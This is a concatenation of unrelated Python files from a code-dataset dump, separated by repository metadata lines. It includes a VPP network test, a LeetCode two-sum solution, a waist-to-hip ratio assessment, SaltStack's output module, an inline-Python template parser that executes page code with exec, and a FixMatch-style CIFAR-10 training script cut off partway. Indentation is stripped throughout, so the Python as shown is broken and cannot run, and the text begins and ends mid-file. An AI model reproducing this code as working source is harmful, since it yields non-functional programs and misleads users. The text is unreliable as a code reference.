[acl.acl_index])
#
# Send packet's that should match the ACL and be dropped
#
rx = self.send_and_assert_no_replies(self.pg2, pkt_tag_to_non_tag * 65)
#
# cleanup
#
self.vapi.acl_interface_set_acl_list(self.pg1.sw_if_index,
0, [])
self.vapi.acl_del(acl.acl_index)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.loop0.sw_if_index, bd_id=1,
port_type=L2_PORT_TYPE.BVI, enable=0)
#
# Do a FIB dump to make sure the paths are correctly reported as DVR
#
routes = self.vapi.ip_fib_dump()
for r in routes:
if (inet_pton(AF_INET, ip_tag_bridged) == r.address):
self.assertEqual(r.path[0].sw_if_index,
sub_if_on_pg3.sw_if_index)
self.assertEqual(r.path[0].is_dvr, 1)
if (inet_pton(AF_INET, ip_non_tag_bridged) == r.address):
self.assertEqual(r.path[0].sw_if_index,
self.pg1.sw_if_index)
self.assertEqual(r.path[0].is_dvr, 1)
#
# the explicit route delete is require so it happens before
# the sbu-interface delete. subinterface delete is required
# because that object type does not use the object registry
#
route_no_tag.remove_vpp_config()
route_with_tag.remove_vpp_config()
sub_if_on_pg3.remove_vpp_config()
sub_if_on_pg2.remove_vpp_config()
def test_l2_emulation(self):
""" L2 Emulation """
#
# non distinct L3 packets, in the tag/non-tag combos
#
pkt_no_tag = (Ether(src=self.pg0.remote_mac,
dst=self.pg1.remote_mac) /
IP(src="2.2.2.2",
dst="1.1.1.1") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_to_tag = (Ether(src=self.pg0.remote_mac,
dst=self.pg2.remote_mac) /
IP(src="2.2.2.2",
dst="1.1.1.2") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_from_tag = (Ether(src=self.pg3.remote_mac,
dst=self.pg2.remote_mac) /
Dot1Q(vlan=93) /
IP(src="2.2.2.2",
dst="1.1.1.1") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_from_to_tag = (Ether(src=self.pg3.remote_mac,
dst=self.pg2.remote_mac) /
Dot1Q(vlan=93) /
IP(src="2.2.2.2",
dst="1.1.1.2") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
pkt_bcast = (Ether(src=self.pg0.remote_mac,
dst="ff:ff:ff:ff:ff:ff") /
IP(src="2.2.2.2",
dst="255.255.255.255") /
UDP(sport=1234, dport=1234) /
Raw('\xa5' * 100))
#
# A couple of sub-interfaces for tags
#
sub_if_on_pg2 = VppDot1QSubint(self, self.pg2, 92)
sub_if_on_pg3 = VppDot1QSubint(self, self.pg3, 93)
sub_if_on_pg2.admin_up()
sub_if_on_pg3.admin_up()
#
# Put all the interfaces into a new bridge domain
#
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg2.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=92)
self.vapi.l2_interface_vlan_tag_rewrite(
sw_if_index=sub_if_on_pg3.sw_if_index, vtr_op=L2_VTR_OP.L2_POP_1,
push_dot1q=93)
#
# Disable UU flooding, learning and ARP terminaation. makes this test
# easier as unicast packets are dropped if not extracted.
#
self.vapi.bridge_flags(bd_id=1, is_set=0,
flags=(1 << 0) | (1 << 3) | (1 << 4))
#
# Add a DVR route to steer traffic at L3
#
route_1 = VppIpRoute(self, "1.1.1.1", 32,
[VppRoutePath("0.0.0.0",
self.pg1.sw_if_index,
is_dvr=1)])
route_2 = VppIpRoute(self, "1.1.1.2", 32,
[VppRoutePath("0.0.0.0",
sub_if_on_pg2.sw_if_index,
is_dvr=1)])
route_1.add_vpp_config()
route_2.add_vpp_config()
#
# packets are dropped because bridge does not flood unknown unicast
#
self.send_and_assert_no_replies(self.pg0, pkt_no_tag)
#
# Enable L3 extraction on pgs
#
self.vapi.l2_emulation(self.pg0.sw_if_index)
self.vapi.l2_emulation(self.pg1.sw_if_index)
self.vapi.l2_emulation(sub_if_on_pg2.sw_if_index)
self.vapi.l2_emulation(sub_if_on_pg3.sw_if_index)
#
# now we expect the packet forward according to the DVR route
#
rx = self.send_and_expect(self.pg0, pkt_no_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_no_tag, rx)
self.assert_has_no_tag(rx)
rx = self.send_and_expect(self.pg0, pkt_to_tag * 65, self.pg2)
self.assert_same_mac_addr(pkt_to_tag, rx)
self.assert_has_vlan_tag(92, rx)
rx = self.send_and_expect(self.pg3, pkt_from_tag * 65, self.pg1)
self.assert_same_mac_addr(pkt_from_tag, rx)
self.assert_has_no_tag(rx)
rx = self.send_and_expect(self.pg3, pkt_from_to_tag * 65, self.pg2)
self.assert_same_mac_addr(pkt_from_tag, rx)
self.assert_has_vlan_tag(92, rx)
#
# but broadcast packets are still flooded
#
self.send_and_expect(self.pg0, pkt_bcast * 33, self.pg2)
#
# cleanup
#
self.vapi.l2_emulation(self.pg0.sw_if_index,
enable=0)
self.vapi.l2_emulation(self.pg1.sw_if_index,
enable=0)
self.vapi.l2_emulation(sub_if_on_pg2.sw_if_index,
enable=0)
self.vapi.l2_emulation(sub_if_on_pg3.sw_if_index,
enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg0.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg2.sw_if_index, bd_id=1, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=sub_if_on_pg3.sw_if_index, bd_id=1, enable=0)
route_1.remove_vpp_config()
route_2.remove_vpp_config()
sub_if_on_pg3.remove_vpp_config()
sub_if_on_pg2.remove_vpp_config()
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
| 37.627204
| 79
| 0.551212
|
6b5eda1b79ebe96d1e9d6bad366cb434fb0157ea
| 362
|
py
|
Python
|
Dataset/Leetcode/train/1/647.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/train/1/647.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/train/1/647.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
class Solution:
def XXX(self, nums: List[int], target: int) -> List[int]:
nums_dict = {}
ret = []
for i in range(len(nums)):
if target - nums[i] not in nums_dict:
nums_dict[nums[i]] = i
else:
ret = [nums_dict.get(target - nums[i]), i]
break
return ret
| 27.846154
| 61
| 0.461326
|
ae5ed281f4884746a98c97766861b2a5dad3ffc4
| 1,366
|
py
|
Python
|
OHA/assessments/WHRAssessment.py
|
openhealthalgorithms/algorithms
|
97ce727079ea18607a4144ff1d053a208bbc6c6e
|
[
"Apache-2.0"
] | 2
|
2017-01-08T11:00:04.000Z
|
2017-01-21T17:38:11.000Z
|
OHA/assessments/WHRAssessment.py
|
fredhersch/openhealthalgorithms
|
97ce727079ea18607a4144ff1d053a208bbc6c6e
|
[
"Apache-2.0"
] | 9
|
2017-08-20T13:59:28.000Z
|
2018-01-20T11:20:12.000Z
|
OHA/assessments/WHRAssessment.py
|
openhealthalgorithms/algorithms
|
97ce727079ea18607a4144ff1d053a208bbc6c6e
|
[
"Apache-2.0"
] | 1
|
2017-01-22T09:53:31.000Z
|
2017-01-22T09:53:31.000Z
|
from OHA.assessments.BaseAssessment import BaseAssessment
from OHA.helpers.converters.HipConverter import HipConverter
from OHA.helpers.converters.WaistConverter import WaistConverter
__author__ = 'indrajit'
__email__ = 'eendroroy@gmail.com'
class WHRAssessment(BaseAssessment):
def __init__(self, input_data=None):
if input_data is not None:
if input_data['gender'] not in ['F', 'M']:
raise ValueError('gender value must be "F" or "M"')
super(WHRAssessment, self).__init__(input_data)
@property
def __waist(self):
waist = self._get_data()['waist']
return WaistConverter(waist[0]).from_unit(waist[1]).converted
@property
def __hip(self):
hip = self._get_data()['hip']
return HipConverter(hip[0]).from_unit(hip[1]).converted
@property
def __gender(self):
return self._get_data()['gender']
@property
def __whr(self):
return round(float(self.__waist / self.__hip), 2)
def assess(self):
result_code = 'WHR-0'
target = 0.85 if self.__gender == 'F' else 0.9
whr = self.__whr
if self.__gender == 'F' and whr >= 0.85:
result_code = 'WHR-1'
elif self.__gender == 'M' and whr >= 0.9:
result_code = 'WHR-2'
return dict(value=whr, code=result_code, target=target)
| 30.355556
| 69
| 0.635432
|
647658c9b7aa65cc4c19d431088458c786d6da07
| 5,041
|
py
|
Python
|
salt/output/__init__.py
|
preoctopus/salt
|
aceaaa0e2f2f2ff29a694393bd82bba0d88fa44d
|
[
"Apache-2.0"
] | 3
|
2015-04-16T18:42:35.000Z
|
2017-10-30T16:57:49.000Z
|
salt/output/__init__.py
|
preoctopus/salt
|
aceaaa0e2f2f2ff29a694393bd82bba0d88fa44d
|
[
"Apache-2.0"
] | 16
|
2015-11-18T00:44:03.000Z
|
2018-10-29T20:48:27.000Z
|
salt/output/__init__.py
|
preoctopus/salt
|
aceaaa0e2f2f2ff29a694393bd82bba0d88fa44d
|
[
"Apache-2.0"
] | 1
|
2020-10-19T11:49:50.000Z
|
2020-10-19T11:49:50.000Z
|
# -*- coding: utf-8 -*-
'''
Used to manage the outputter system. This package is the modular system used
for managing outputters.
'''
# Import python libs
from __future__ import print_function
from __future__ import absolute_import
import os
import sys
import errno
import logging
import traceback
from salt.ext.six import string_types
# Import salt libs
import salt.loader
import salt.utils
from salt.utils import print_cli
import salt.ext.six as six
# Are you really sure !!!
# dealing with unicode is not as simple as setting defaultencoding
# which can break other python modules imported by salt in bad ways...
# reloading sys is not either a good idea...
# reload(sys)
# sys.setdefaultencoding('utf-8')
log = logging.getLogger(__name__)
def try_printout(data, out, opts):
'''
Safely get the string to print out, try the configured outputter, then
fall back to nested and then to raw
'''
try:
return get_printout(out, opts)(data).rstrip()
except (KeyError, AttributeError):
log.debug(traceback.format_exc())
try:
return get_printout('nested', opts)(data).rstrip()
except (KeyError, AttributeError):
log.error('Nested output failed: ', exc_info=True)
return get_printout('raw', opts)(data).rstrip()
def get_progress(opts, out, progress):
'''
Get the progress bar from the given outputter
'''
return salt.loader.raw_mod(opts,
out,
'rawmodule',
mod='output')['{0}.progress_iter'.format(out)](progress)
def update_progress(opts, progress, progress_iter, out):
'''
Update the progress iterator for the given outputter
'''
# Look up the outputter
try:
progress_outputter = salt.loader.outputters(opts)[out]
except KeyError: # Outputter is not loaded
log.warning('Progress outputter not available.')
return False
progress_outputter(progress, progress_iter)
def progress_end(progress_iter):
try:
progress_iter.stop()
except Exception:
pass
return None
def display_output(data, out=None, opts=None):
'''
Print the passed data using the desired output
'''
if opts is None:
opts = {}
display_data = try_printout(data, out, opts)
output_filename = opts.get('output_file', None)
log.trace('data = {0}'.format(data))
try:
# output filename can be either '' or None
if output_filename:
with salt.utils.fopen(output_filename, 'a') as ofh:
fdata = display_data
if isinstance(fdata, six.text_type):
try:
fdata = fdata.encode('utf-8')
except (UnicodeDecodeError, UnicodeEncodeError):
# try to let the stream write
# even if we didn't encode it
pass
ofh.write(fdata)
ofh.write('\n')
return
if display_data:
print_cli(display_data)
except IOError as exc:
# Only raise if it's NOT a broken pipe
if exc.errno != errno.EPIPE:
raise exc
def get_printout(out, opts=None, **kwargs):
'''
Return a printer function
'''
if opts is None:
opts = {}
if 'output' in opts:
# new --out option
out = opts['output']
if out == 'text':
out = 'txt'
elif out is None or out == '':
out = 'nested'
if opts.get('progress', False):
out = 'progress'
opts.update(kwargs)
if 'color' not in opts:
def is_pipe():
'''
Check if sys.stdout is a pipe or not
'''
try:
fileno = sys.stdout.fileno()
except AttributeError:
fileno = -1 # sys.stdout is StringIO or fake
return not os.isatty(fileno)
if opts.get('force_color', False):
opts['color'] = True
elif opts.get('no_color', False) or is_pipe() or salt.utils.is_windows():
opts['color'] = False
else:
opts['color'] = True
outputters = salt.loader.outputters(opts)
if out not in outputters:
# Since the grains outputter was removed we don't need to fire this
# error when old minions are asking for it
if out != 'grains':
log.error('Invalid outputter {0} specified, fall back to nested'.format(out))
return outputters['nested']
return outputters[out]
def out_format(data, out, opts=None):
'''
Return the formatted outputter string for the passed data
'''
return try_printout(data, out, opts)
def strip_esc_sequence(txt):
'''
Replace ESC (ASCII 27/Oct 33) to prevent unsafe strings
from writing their own terminal manipulation commands
'''
if isinstance(txt, six.string_types):
return txt.replace('\033', '?')
else:
return txt
| 28.642045
| 89
| 0.597104
|
53e5778d56f5af9fdcb29309be4063e3b9951ddb
| 3,609
|
py
|
Python
|
system/ilpy.py
|
melvin2204/Webserver
|
653be0c0a3fadbced422a8b57e5a07ad8acef207
|
[
"MIT"
] | 1
|
2018-05-05T00:03:03.000Z
|
2018-05-05T00:03:03.000Z
|
system/ilpy.py
|
melvin2204/Webserver
|
653be0c0a3fadbced422a8b57e5a07ad8acef207
|
[
"MIT"
] | 2
|
2018-05-04T23:52:49.000Z
|
2018-05-11T23:16:13.000Z
|
system/ilpy.py
|
melvin2204/Webserver
|
653be0c0a3fadbced422a8b57e5a07ad8acef207
|
[
"MIT"
] | null | null | null |
#inline python parser
import os
import time
import string
import random
StartTag = False #encountered a start tag
code = "" #received code
output = "" #final output
tempFileName = None #name for the temp file
idCode = None
idCodes = []
def work(line,arguments):
global StartTag,code,output,idCode
if line.lstrip()[:4] == "<?py": #if the line is a start tag
StartTag = True #found a start tag
addBreaker()
return #stop further execution
if line.lstrip()[:2] == "?>": #if the line is an end tag
#runCode(arguments) #execute the collected code
output = output + "ilpy" + idCode
StartTag = False #remove the start tag
return
code = code + line #if it isnt a start or end tag, place the line to the final code to run
def id(size=6, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def addBreaker():
global code,idCode
idCode = id(size=100)
idCodes.append(idCode)
injection = """\
ilpySegmentCode = '""" + idCode + """'
"""
code = code + injection
def runCode(arguments):
global code,output, tempFileName
tempFileName = int(round(time.time() * 1000)) #make a temp file name
injectionCode = """\
ilpyCurrentSegment = ""
def void(*args, **kwargs):
return
def output(text,*args, **kwargs):
global ilpyCurrentSegment,ilpySegmentCode
file = open('""" + str(tempFileName) + """.ilpytemp',"a")
if ilpyCurrentSegment != ilpySegmentCode and ilpyCurrentSegment != "":
file.write(ilpyCurrentSegment)
ilpyCurrentSegment = ""
if ilpyCurrentSegment == "":
ilpyCurrentSegment = ilpySegmentCode
if not ilpySegmentCode == "end":
file.write(str(text) + "\\n")
file.close()
input = void
#print = output
""" #code to inject to collect the output
code = injectionCode + code #add it to the code
try:
file = open(str(tempFileName) + ".ilpytemp","w+") #make a temp file
file.close()
exec(code,arguments) #run the code with the arguments from the server
except Exception as e:
file = open(str(tempFileName) + ".ilpytemp","a") #write any errors to the temp file
file.write(str(e) + "\n")
file.close()
finally:
file = open(str(tempFileName) + ".ilpytemp", "r") #read the temp file
result = file.read()
for id in idCodes:
codeOutput = result.split(id)[0]
output = output.replace("ilpy"+id,codeOutput)
result = result.replace(codeOutput + id,"")
file.close()
def run(runFile,arguments):
global StartTag,output,code,tempFileName
file = open(runFile, "r") #open the requested ilpy file
for line in file.readlines(): #read every line
if line.lstrip()[:4] == "<?py" or (line.lstrip()[:2] == "?>" and StartTag ) or StartTag: #if it is a start tag, end tag, or it already encountered a start tag
work(line,arguments) #analyise the line
else: #the line contains no code
output = output + line #write the line to the final output
file.close()
code = code + "\n\n\nilpySegmentCode = 'end'\noutput('')"
runCode(arguments)
outputTemp = output #store the output in a temp var
output = "" #clear all the variables
code = ""
StartTag = False
try:
os.remove(str(tempFileName) + ".ilpytemp") #remove the temp file
finally:
return outputTemp #return the final output
| 36.454545
| 168
| 0.613743
|
26ba0f3c4590bd4420a59977df7e33dcd8f652f1
| 18,149
|
py
|
Python
|
meps_train.py
|
ylsung/cifar10-fast
|
8dcf3841d3ecbf645642f4b78b6adc51d4920f9e
|
[
"MIT"
] | null | null | null |
meps_train.py
|
ylsung/cifar10-fast
|
8dcf3841d3ecbf645642f4b78b6adc51d4920f9e
|
[
"MIT"
] | null | null | null |
meps_train.py
|
ylsung/cifar10-fast
|
8dcf3841d3ecbf645642f4b78b6adc51d4920f9e
|
[
"MIT"
] | null | null | null |
import os
import argparse
import numpy as np
import torch
import torch.nn as nn
from collections import namedtuple, OrderedDict
import torchvision as tv
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, Subset
from torch import optim
from functools import partial
import copy
import math
import random
from randaugment import RandAugmentMC
from PIL import Image
from meps import meps_wrapper
from core import (
normalise,
transpose,
pad,
preprocess,
PiecewiseLinear,
map_nested,
Timer,
group_by_key,
Table,
union,
Crop,
FlipLR,
flip_lr
)
from torch_backend import (
cifar10,
cifar10_mean,
cifar10_std,
cifar10_classes,
cov,
patches,
eigens,
to,
trainable_params,
Flatten,
Mul,
GhostBatchNorm,
GPUBatches,
)
from dawn_utils import tsv
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='./data')
parser.add_argument('--log_dir', type=str, default='logs')
parser.add_argument('--mu', type=int, default=1)
parser.add_argument('--file_name', type=str, default="log.tsv")
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=10)
parser.add_argument('--batch_size', type=int, default=512)
parser.add_argument('--threshold', type=float, default=0.95)
parser.add_argument('--ema_step', type=int, default=5)
parser.add_argument('--ema_momentum', type=float, default=0.99)
parser.add_argument('--meps', action='store_true', default=False,
help='use MEPS to compute logits')
parser.add_argument('--meps-type', default='meps', type=str,
choices=['meps', 'dwac'],
help='use MEPS formulation or DWAC')
parser.add_argument('--unsup', default=False, action='store_true')
parser.add_argument('--similarity', default='normalized_l2', type=str,
choices=['rbf', 'l2', 'normalized_l2', 'dot_product', 'polynomial', 'normalized_dot_product'],
help='choice of similarity function (note that pos-def kernel function must be used with DWAC')
parser.add_argument('--temperature', type=float, default=1)
parser.add_argument('--num_labeled', type=int, default=40)
parser.add_argument('--device', type=str, default="cuda")
parser.add_argument('--n_classes', type=int, default=10)
STEP = 0
batch_norm = partial(GhostBatchNorm, num_splits=16, weight_freeze=True)
# batch_norm = nn.BatchNorm2d
def set_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
class ConvBN(nn.Module):
def __init__(self, c_in, c_out, pool=None):
super().__init__()
self.conv = nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False)
self.pool = pool
self.bn = batch_norm(c_out) # nn.BatchNorm2d(c_out) #
self.relu = nn.CELU(alpha=0.3)
def forward(self, x):
out = self.conv(x)
if self.pool is not None:
out = self.pool(out)
out = self.bn(out)
out = self.relu(out)
return out
class WhiteningFilter(nn.Module):
def __init__(self, Λ, V, eps=1e-2):
super().__init__()
filt = nn.Conv2d(3, 27, kernel_size=(3,3), padding=(1,1), bias=False)
filt.weight.data = (V/torch.sqrt(Λ+eps)[:,None,None,None])
filt.weight.requires_grad = False
self.filt = filt
def forward(self, x):
return self.filt(x)
class WhiteningBlock(nn.Module):
def __init__(self, c_in, c_out, Λ=None, V=None, eps=1e-2):
super().__init__()
self.whitening = WhiteningFilter(Λ, V, eps)
self.layers = nn.Sequential(OrderedDict([
('conv', nn.Conv2d(27, c_out, kernel_size=(1, 1), bias=False)),
('bn', batch_norm(c_out)), # nn.BatchNorm2d(c_out)),
('relu', nn.CELU(alpha=0.3))
]))
def forward(self, x):
out = self.whitening(x)
out = self.layers(out)
return out
class Residual(nn.Module):
def __init__(self, c):
super().__init__()
self.conv1 = ConvBN(c, c)
self.conv2 = ConvBN(c, c)
def forward(self, x):
return x + self.conv2(self.conv1(x))
class ResNet9(nn.Module):
def __init__(self, weight, Λ, V):
super().__init__()
channels = [64, 128, 256, 512]
residuals = [False, True, False, True]
self.layers = []
self.layers.append(
WhiteningBlock(3, channels[0], Λ, V)
)
pool = nn.MaxPool2d(2)
for i in range(1, len(channels)):
self.layers.append(
ConvBN(channels[i-1], channels[i], pool=pool)
)
if residuals[i]:
self.layers.append(
Residual(channels[i])
)
self.layers.extend([
nn.MaxPool2d(4),
Flatten(),
# nn.Linear(channels[-1], 10, bias=False),
Mul(weight)
])
self.layers = nn.ModuleList(self.layers)
def forward(self, x):
out = x
for layer in self.layers:
out = layer(out)
return out
def half(self):
for n, p in self.named_parameters():
if "bn" not in n:
p.data = p.data.half()
return self
class LabelSmoothingLoss:
def __init__(self, alpha):
self.alpha = alpha
def __call__(self, logits, targets):
log_probs = F.log_softmax(logits, -1, _stacklevel=5)
cross_entropy = F.nll_loss(log_probs, targets, reduction='none')
kl = -log_probs.mean(dim=-1)
loss = (1 - self.alpha) * cross_entropy + self.alpha * kl
return loss.sum()
class Transform(Dataset):
def __init__(self, dataset, device, transforms=None, to_pil=False):
super().__init__()
self.data, self.targets = dataset["data"], dataset["targets"]
if to_pil:
func = NumpyToPIL()
self.data = [func(d) for d in self.data]
self.transforms = transforms
self.device = device
def __len__(self):
return len(self.data)
def __getitem__(self, index):
data, targets = self.data[index], self.targets[index]
if self.transforms:
data = self.transforms(data)
return data, targets
class TransformFixMatch(object):
def __init__(self, mean, std):
self.weak = tv.transforms.Compose([
# NumpyToPIL(),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.RandomCrop(size=32,
padding=4,
padding_mode='reflect')])
self.strong = tv.transforms.Compose([
# NumpyToPIL(),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.RandomCrop(size=32,
padding=4,
padding_mode='reflect'),
RandAugmentMC(n=2, m=10)])
self.normalize = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean=mean, std=std),
ToHalf()])
def __call__(self, x):
weak = self.weak(x)
strong = self.strong(x)
return self.normalize(weak), self.normalize(strong)
class MEPSTransform:
def __init__(self, transform):
self.transform = transform
def __call__(self, x):
return x, self.transform(x)
class ToHalf:
def __call__(self, x):
return x.half()
class NumpyToPIL:
def __call__(self, x):
return Image.fromarray(x)
def update_ema(momentum, update_freq=1):
rho = momentum**update_freq
def step(step, model, ema_model):
if (step % update_freq) != 0: return
for v, ema_v in zip(model.state_dict().values(), ema_model.state_dict().values()):
if not v.dtype.is_floating_point: continue #skip things like num_batches_tracked.
ema_v *= rho
ema_v += (1-rho)*v
return step
def interleave(x, size):
s = list(x.shape)
return x.reshape([-1, size] + s[1:]).transpose(0, 1).reshape([-1] + s[1:])
def de_interleave(x, size):
s = list(x.shape)
return x.reshape([size, -1] + s[1:]).transpose(0, 1).reshape([-1] + s[1:])
def train(args, device, model, ema_model, train_batches, unlabeled_batches, opts, lr_schedulers, loss_func):
ema_func = update_ema(args.ema_momentum, args.ema_step)
train_meter = {
"loss": 0,
"acc": 0,
"mask": 0,
"n": 0
}
model.train()
ema_model.train()
global STEP
unlabeled_iter = iter(unlabeled_batches)
# loop over the labeled data
for batch in train_batches:
for opt, scheduler in zip(opts, lr_schedulers):
lr = scheduler(STEP)
for param_group in opt.param_groups:
param_group['lr'] = lr
inputs_x, targets_x = batch
# (inputs_u_w, inputs_u_s), _ = u_batch
try:
(inputs_u_w, inputs_u_s), _ = unlabeled_iter.next()
except:
unlabeled_iter = iter(unlabeled_batches)
(inputs_u_w, inputs_u_s), _ = unlabeled_iter.next()
batch_size = inputs_x.shape[0]
inputs = interleave(
torch.cat((inputs_x, inputs_u_w, inputs_u_s)), 2*args.mu+1).to(device)
targets_x = targets_x.to(device)
logits = model(inputs)
logits = de_interleave(logits, 2*args.mu+1)
logits_x = logits[:batch_size]
logits_u_w, logits_u_s = logits[batch_size:].chunk(2)
del logits
# Lx = loss_func(logits_x, targets_x)
Lx = F.cross_entropy(logits_x, targets_x, reduction='none').mean()
pseudo_label = torch.softmax(logits_u_w.detach()/1, dim=-1)
max_probs, targets_u = torch.max(pseudo_label, dim=-1)
mask = max_probs.ge(args.threshold).float()
Lu = (F.cross_entropy(logits_u_s, targets_u,
reduction='none') * mask).mean()
loss = (0.5 * Lx + 0.5 * Lu) * batch_size
loss.backward()
for opt in opts:
opt.step()
opt.zero_grad()
train_meter["loss"] += loss.item()
train_meter["acc"] += (logits_x.max(dim=-1)[1] == targets_x).sum().item()
train_meter["n"] += batch_size
train_meter["mask"] += mask.mean().item() * batch_size
ema_func(STEP, model, ema_model)
STEP += 1
train_meter["loss"] = train_meter["loss"] / train_meter["n"]
train_meter["acc"] = train_meter["acc"] / train_meter["n"]
train_meter["mask"] = train_meter["mask"] / train_meter["n"]
del train_meter["n"]
return train_meter
def warmup_cudnn(loss_func, batch_sizes, device):
random_batch = lambda batch_size: {
'input': torch.Tensor(np.random.rand(batch_size,3,32,32)).cuda().half(),
'target': torch.LongTensor(np.random.randint(0,10,batch_size)).cuda()
}
random_data = torch.tensor(np.random.randn(1000,3,32,32).astype(np.float16), device=device)
Λ, V = eigens(patches(random_data))
model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
for size in batch_sizes:
batch = random_batch(size)
inputs, targets = batch["input"], batch["target"]
logits = model(inputs)
loss = F.cross_entropy(logits, targets, reduction='none').sum()
model.zero_grad()
loss.backward()
torch.cuda.synchronize()
@torch.no_grad()
def test(device, model, ema_model, test_batches, loss_func, tta=None):
meter = {
"loss": 0,
"acc": 0,
"n": 0
}
model.eval()
ema_model.eval()
for batch in test_batches:
inputs, targets = batch
inputs, targets = inputs.to(device), targets.to(device)
# inputs, targets = batch["input"], batch["target"]
if tta:
logits = torch.mean(torch.stack([ema_model(t(inputs)) for t in tta], dim=0), dim=0)
else:
logits = ema_model(inputs)
# loss = loss_func(logits, targets)
loss = F.cross_entropy(logits, targets, reduction='none').sum()
meter["loss"] += loss.item()
meter["acc"] += (logits.max(dim=-1)[1] == targets).sum().item()
meter["n"] += inputs.shape[0]
meter["loss"] = meter["loss"] / meter["n"]
meter["acc"] = meter["acc"] / meter["n"]
del meter["n"]
return meter
def x_u_split(labels, expand_samples, num_labeled, num_classes):
# https://github.com/kekmodel/FixMatch-pytorch/blob/master/dataset/cifar.py
label_per_class = num_labeled // num_classes
labels = np.array(labels)
labeled_idx = []
# unlabeled data: all data (https://github.com/kekmodel/FixMatch-pytorch/issues/10)
unlabeled_idx = np.array(range(len(labels)))
for i in range(num_classes):
idx = np.where(labels == i)[0]
idx = np.random.choice(idx, label_per_class, False)
labeled_idx.extend(idx)
labeled_idx = np.array(labeled_idx)
assert len(labeled_idx) == num_labeled
num_expand_x = math.ceil(expand_samples / num_labeled)
labeled_idx = np.hstack([labeled_idx for _ in range(num_expand_x)])
np.random.shuffle(labeled_idx)
return labeled_idx, unlabeled_idx
if __name__ == "__main__":
args = parser.parse_args()
set_seed(args.seed)
device = args.device
print(args)
print('Downloading datasets')
# dataset = map_nested(torch.tensor, cifar10(args.data_dir))
dataset = cifar10(args.data_dir)
epochs, ema_epochs = args.epochs, 2
lr_schedule = PiecewiseLinear([0, epochs/5, epochs-ema_epochs], [0, 1.0, 0.1])
batch_size = args.batch_size
# train_transforms = [Crop(32, 32), FlipLR()]
loss_func = LabelSmoothingLoss(0.2)
print('Warming up torch')
warmup_cudnn(
loss_func,
[batch_size, batch_size*(2*args.mu+1), len(dataset['valid']['targets']) % batch_size], # normal batch size and val last batch size
device
)
print('Starting timer')
timer = Timer(synch=torch.cuda.synchronize)
# Separate dataset
labeled_idx, unlabeled_idx = x_u_split(
dataset['train']['targets'],
50000,
args.num_labeled,
10
)
print(len(labeled_idx), len(unlabeled_idx))
print('Preprocessing training data')
# dataset = map_nested(to(device), dataset)
# T = lambda x: torch.tensor(x, dtype=torch.float16, device=device)
T = lambda x: torch.tensor(x, dtype=torch.float16)
transforms = [
# torch.tensor
# to(dtype=torch.float16),
T,
partial(normalise, mean=T(cifar10_mean), std=T(cifar10_std)),
partial(transpose, source='NHWC', target='NCHW'),
]
train_set = preprocess(dataset['train'], transforms)
Λ, V = eigens(patches(train_set['data'][:10000,:])) #center crop to remove padding
model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
print(f'Finished in {timer():.2} seconds')
print('Preprocessing test data')
test_set = preprocess(dataset['valid'], transforms)
print(f'Finished in {timer():.2} seconds')
tensor_mean, tensor_std = (0.4914, 0.4822, 0.4465), (0.2471, 0.2435, 0.2616)
train_transforms = tv.transforms.Compose([
tv.transforms.RandomHorizontalFlip(p=0.5),
tv.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),
])
unlabeled_transforms = TransformFixMatch(tensor_mean, tensor_std)
meps_transform = MEPSTransform(train_transforms)
unique_train_set = Transform(train_set, device, meps_transform)
unique_train_set = Subset(unique_train_set, np.unique(labeled_idx))
train_set = Transform(train_set, device, train_transforms)
train_set = Subset(train_set, labeled_idx)
unlabeled_set = Transform(dataset['train'], device, unlabeled_transforms, to_pil=True)
unlabeled_set = Subset(unlabeled_set, unlabeled_idx)
